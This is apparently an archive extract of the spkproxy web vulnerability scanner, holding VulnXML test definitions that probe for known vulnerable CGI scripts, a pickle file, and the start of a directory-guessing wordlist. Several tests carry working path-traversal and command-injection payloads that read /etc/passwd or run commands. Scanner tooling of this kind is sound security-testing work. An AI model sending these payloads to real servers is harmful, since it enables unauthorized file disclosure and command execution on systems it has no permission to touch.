200 spkproxy/VulnXML/DirectoryTests/directorytest-972.xml0100664000076500007650000000704207566204543021671 0ustar davedave (dig.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dig.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-973.xml0100664000076500007650000000735007566204543021674 0ustar davedave (directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00) "This CGI allows attackers to read arbitrary files on the server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-974.xml0100664000076500007650000000705407566204543021676 0ustar davedave (displayTC.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}displayTC.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-975.xml0100664000076500007650000000711607566204543021676 0ustar davedave (dnewsweb) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dnewsweb HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-976.xml0100664000076500007650000000712007566204543021672 0ustar davedave (donothing) "This might be interesting... has been seen in web logs from a scanner." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}donothing HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-977.xml0100664000076500007650000000710107566204543021672 0ustar davedave (download.cgi) "v1 by Matt Wright; check info in Phrack 55 by RFP" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}download.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-978.xml0100664000076500007650000000707507566204543021705 0ustar davedave (dumpenv.pl) "This CGI gives a lot of information to attackers." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}dumpenv.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-979.xml0100664000076500007650000000710007566204543021673 0ustar davedave (echo.bat) "This CGI may allow attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}echo.bat HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-980.xml0100664000076500007650000000714107566204543021670 0ustar davedave (echo.bat?&dir+c:\) "This batch file may allow attackers to execute remote commands." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}echo.bat?&dir+c:\ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-981.xml0100664000076500007650000000704207566204543021671 0ustar davedave (edit.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}edit.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-982.xml0100664000076500007650000000731207566204543021672 0ustar davedave (empower?DB=whateverwhatever) "This CGI allows attackers to learn the full system path to your web directory." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}empower?DB=whateverwhatever HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ db name whateverwhatever of directory / 200 db name whateverwhatever of directory / 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-983.xml0100664000076500007650000000736307566204543021701 0ustar davedave (emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-984.xml0100664000076500007650000000734107566204543021676 0ustar davedave (emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-985.xml0100664000076500007650000000736107566204543021701 0ustar davedave (emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00) "EmuMail allows any file to be retrieved from the remote system." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-986.xml0100664000076500007650000000704607566204543021702 0ustar davedave (enter.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}enter.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-987.xml0100664000076500007650000000705207566204543021700 0ustar davedave (environ.cgi) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}environ.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-988.xml0100664000076500007650000000705007566204543021677 0ustar davedave (environ.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}environ.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-989.xml0100664000076500007650000000722607566204543021705 0ustar davedave (eshop.pl/seite=;cat%20eshop.pl|) "This CGI allows attackers to execute commands on the remote server. CAN-2001-1014." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}eshop.pl/seite=;cat%20eshop.pl| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ \\/perl 200 \\/perl 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-990.xml0100664000076500007650000000705407566204543021674 0ustar davedave (ex-logger.pl) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ex-logger.pl HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-991.xml0100664000076500007650000000704007566204543021670 0ustar davedave (excite) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}excite HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-992.xml0100664000076500007650000000711407566204543021673 0ustar davedave (ezadmin.cgi) "Some versions of this CGI are vulnerable to a buffer overflow." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ezadmin.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-993.xml0100664000076500007650000000711407566204543021674 0ustar davedave (ezboard.cgi) "Some versions of this CGI are vulnerable to a buffer overflow." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ezboard.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-994.xml0100664000076500007650000000711007566204543021671 0ustar davedave (ezman.cgi) "Some versions of this CGI are vulnerable to a buffer overflow." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ezman.cgi HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-995.xml0100664000076500007650000000723507566204543021702 0ustar davedave (ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|) "EZShopper loadpage CGI read arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd| HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-996.xml0100664000076500007650000000740707566204543021704 0ustar davedave (ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1) "EZShopper search CGI read arbitrary files" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-997.xml0100664000076500007650000000731207566204543021700 0ustar davedave (faqmanager.cgi?toc=/etc/passwd%00) "FAQmanager allows arbitrary files to be read on the host. Upgrade to latest version: http://www.fourteenminutes.com/code/faqmanager/" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}faqmanager.cgi?toc=/etc/passwd%00 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-998.xml0100664000076500007650000000720007566204543021675 0ustar davedave (faxsurvey?cat%20/etc/passwd) "This CGI allows attackers to execute commands and read files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}faxsurvey?cat%20/etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-999.xml0100664000076500007650000000704407566204543021704 0ustar davedave (filemail) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}filemail HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/DirectoryTests/directorytest-9.xml0100664000076500007650000000704507566204543021523 0ustar davedave (iisstart.asp) "iisstart.asp detected" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET ${path}iisstart.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/testpickle.pickle0100664000076500007650000000160307555550367014773 0ustar davedave(irequestandresponse RequestAndResponse p0 (dp1 S'serverheader' p2 (ispkproxy header p3 (dp4 S'sawCONNECT' p5 I0 sS'useSSL' p6 I0 sS'useRawArguments' p7 I0 sS'firstline' p8 S'' p9 sS'URL' p10 g9 sS'headerValuesDict' p11 (dp12 sS'goodHeader' p13 I0 sS'sawsslinit' p14 I0 sS'responseHeader' p15 I0 sS'connectPort' p16 I0 sS'wasChunked' p17 I0 sS'done' p18 I0 sS'connectHost' p19 g9 sS'returncode' p20 g9 sS'allURLargs' p21 g9 sS'returnmessage' p22 g9 sS'URLargsDict' p23 (dp24 sS'data' p25 (lp26 sS'clientisSSL' p27 I0 sS'mybodysize' p28 I0 sbsS'serverbody' p29 (ispkproxy body p30 (dp31 g25 (lp32 sS'mysize' p33 I0 sbsS'clientheader' p34 (ispkproxy header p35 (dp36 g5 I0 sg6 I0 sg7 I0 sg8 g9 sg10 g9 sg11 (dp37 sg13 I0 sg14 I0 sg15 I0 sg16 I0 sg17 I0 sg18 I0 sg19 g9 sg20 g9 sg21 g9 sg22 g9 sg23 (dp38 sg25 (lp39 sg27 I0 sg28 I0 sbsS'clientbody' p40 (ispkproxy body p41 (dp42 g25 (lp43 sg33 I0 sbsb.spkproxy/allwords0100644000076500007650000144002607555550431013202 0ustar davedaveadmin bak Admin Backup warez pr0n porn Scripts IISHelp IISAdmin IISSamples MSADC _vti_bin PBServer PBSData Rpc Printers BizTalkServerDocs BizTalkServerRepository MessagingManager BizTalkTracking NR content images _private _vti_conf _vti_log _vti_pvt _vti_script _vti_txt Microsoft aspbackup maps sdk htmldocs html iis endofspecialwords Aarhus Aaron Ababa aback abaft abandon abandoned abandoning abandonment abandons abase abased abasement abasements abases abash abashed abashes abashing abasing abate abated abatement abatements abater abates abating Abba abbe abbey abbeys abbot abbots Abbott abbreviate abbreviated abbreviates abbreviating abbreviation abbreviations Abby abdomen abdomens abdominal abduct abducted abduction abductions abductor abductors abducts Abe abed Abel Abelian Abelson Aberdeen Abernathy aberrant aberration aberrations abet abets abetted abetter abetting abeyance abhor abhorred abhorrent abhorrer abhorring abhors abide abided abides abiding Abidjan Abigail Abilene abilities ability abject abjection abjections abjectly abjectness abjure abjured abjures abjuring ablate ablated ablates ablating ablation ablative ablaze able abler ablest ably Abner abnormal abnormalities abnormality abnormally Abo aboard abode abodes abolish abolished abolisher abolishers abolishes abolishing abolishment abolishments abolition abolitionist abolitionists abominable abominate aboriginal aborigine aborigines abort aborted aborting abortion abortions abortive abortively aborts Abos abound abounded abounding abounds about above aboveboard aboveground abovementioned abrade abraded abrades abrading Abraham Abram Abrams Abramson abrasion abrasions abrasive abreaction abreactions abreast abridge abridged abridges abridging abridgment abroad abrogate abrogated abrogates abrogating abrupt abruptly abruptness abscess abscessed abscesses abscissa abscissas abscond absconded absconding absconds absence absences absent absented absentee absenteeism absentees absentia absenting absently absentminded absents absinthe absolute absolutely absoluteness absolutes absolution absolve absolved absolves absolving absorb absorbed absorbency absorbent absorber absorbing absorbs absorption absorptions absorptive abstain abstained abstainer abstaining abstains abstention abstentions abstinence abstract abstracted abstracting abstraction abstractionism abstractionist abstractions abstractly abstractness abstractor abstractors abstracts abstruse abstruseness absurd absurdities absurdity absurdly Abu abundance abundant abundantly abuse abused abuses abusing abusive abut abutment abuts abutted abutter abutters abutting abysmal abysmally abyss abysses Abyssinia Abyssinian Abyssinians acacia academia academic academically academics academies academy Acadia Acapulco accede acceded accedes accelerate accelerated accelerates accelerating acceleration accelerations accelerator accelerators accelerometer accelerometers accent accented accenting accents accentual accentuate accentuated accentuates accentuating accentuation accept acceptability acceptable acceptably acceptance acceptances accepted accepter accepters accepting acceptor acceptors accepts access accessed accesses accessibility accessible accessibly accessing accession accessions accessories accessors accessory accident accidental accidentally accidently accidents acclaim acclaimed acclaiming acclaims acclamation acclimate acclimated acclimates acclimating acclimatization acclimatized accolade accolades accommodate accommodated accommodates accommodating accommodation accommodations accompanied accompanies accompaniment accompaniments accompanist accompanists accompany accompanying accomplice accomplices accomplish accomplished accomplisher accomplishers accomplishes accomplishing accomplishment accomplishments accord accordance accorded accorder accorders according accordingly accordion accordions accords accost accosted accosting accosts account accountability accountable accountably accountancy accountant accountants accounted accounting accounts Accra accredit accreditation accreditations accredited accretion accretions accrue accrued accrues accruing acculturate acculturated acculturates acculturating acculturation accumulate accumulated accumulates accumulating accumulation accumulations accumulator accumulators accuracies accuracy accurate accurately accurateness accursed accusal accusation accusations accusative accuse accused accuser accuses accusing accusingly accustom accustomed accustoming accustoms ace aces acetate acetone acetylene Achaean Achaeans ache ached aches achievable achieve achieved achievement achievements achiever achievers achieves achieving Achilles aching acid acidic acidities acidity acidly acids acidulous Ackerman Ackley acknowledge acknowledgeable acknowledged acknowledgement acknowledgements acknowledger acknowledgers acknowledges acknowledging acknowledgment acknowledgments acme acne acolyte acolytes acorn acorns acoustic acoustical acoustically acoustician acoustics acquaint acquaintance acquaintances acquainted acquainting acquaints acquiesce acquiesced acquiescence acquiescent acquiesces acquiescing acquirable acquire acquired acquires acquiring acquisition acquisitions acquisitive acquisitiveness acquit acquits acquittal acquitted acquitter acquitting acre acreage acres acrid acrimonious acrimony acrobat acrobatic acrobatics acrobats acronym acronyms acropolis across acrylic act Acta Actaeon acted acting actinium actinometer actinometers action actions activate activated activates activating activation activations activator activators active actively activism activist activists activities activity Acton actor actors actress actresses Acts actual actualities actuality actualization actually actuals actuarial actuarially actuate actuated actuates actuating actuator actuators acuity acumen acute acutely acuteness acyclic acyclically ad Ada adage adages adagio adagios Adair Adam adamant adamantly Adams Adamson adapt adaptability adaptable adaptation adaptations adapted adapter adapters adapting adaptive adaptively adaptor adaptors adapts add added addend addenda addendum adder adders addict addicted addicting addiction addictions addicts adding Addis Addison addition additional additionally additions additive additives additivity address addressability addressable addressed addressee addressees addresser addressers addresses addressing Addressograph adds adduce adduced adduces adducible adducing adduct adducted adducting adduction adductor adducts Adelaide Adele Adelia Aden adept adequacies adequacy adequate adequately adhere adhered adherence adherent adherents adherer adherers adheres adhering adhesion adhesions adhesive adhesives adiabatic adiabatically adieu Adirondack Adirondacks adjacency adjacent adjective adjectives adjoin 